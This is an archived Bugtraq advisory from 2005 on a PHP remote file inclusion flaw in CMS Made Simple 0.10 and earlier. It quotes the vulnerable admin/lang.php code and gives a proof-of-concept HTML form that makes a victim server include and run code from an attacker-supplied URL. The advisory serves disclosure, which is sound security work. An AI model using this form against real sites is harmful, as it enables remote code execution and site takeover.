[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: CMS Made Simple <= 0.10 - PHP injection
From: groszynskif () gmail ! com
Date: 2005-08-31 19:18:04
Message-ID: 20050831191804.11058.qmail () securityfocus ! com
[Download RAW message or body]
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: CMS Made Simple - PHP injection
Version <= 0.10
Homepage: http://www.cmsmadesimple.org/
Author: Filip Groszynski (VXSfx)
Date: 31 August 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Background:
CMS Made Simple is an easy to use content managment
system for simple stable content site. Uses PHP, MySQL
and Smarty templating system.
--------------------------------------------------------
Vulnerable code exist in ./admin/lang.php:
<?php
...
$current_language = "en_US";
#Only do language stuff for admin pages
[!] if (isset($CMS_ADMIN_PAGE)) {
...
#Check to see if there is already a language in use...
if (isset($_POST["change_cms_lang"])) {
[!] $current_language = $_POST["change_cms_lang"];
setcookie("cms_language", $_POST["change_cms_lang"]);
} else if (isset($_COOKIE["cms_language"])) {
$current_language = $_COOKIE["cms_language"];
}
else {
...
}
#Ok, we have a language to load, let's load it already...
if (isset($nls['file'][$current_language])) {
foreach ($nls['file'][$current_language] as $onefile) {
[!] include($onefile);
}
}
...
}
...
?>
--------------------------------------------------------
Exploit:
example.html:
<form action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" \
method=post> <input type=hidden name=change_cms_lang value=vx>
<input type=submit name=test VALUE="do it">
</form>
EOF
--------------------------------------------------------
Contact:
Author: Filip Groszynski (VXSfx)
Location: Poland <Warsaw>
Email: groszynskif <|> gmail <|> com
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic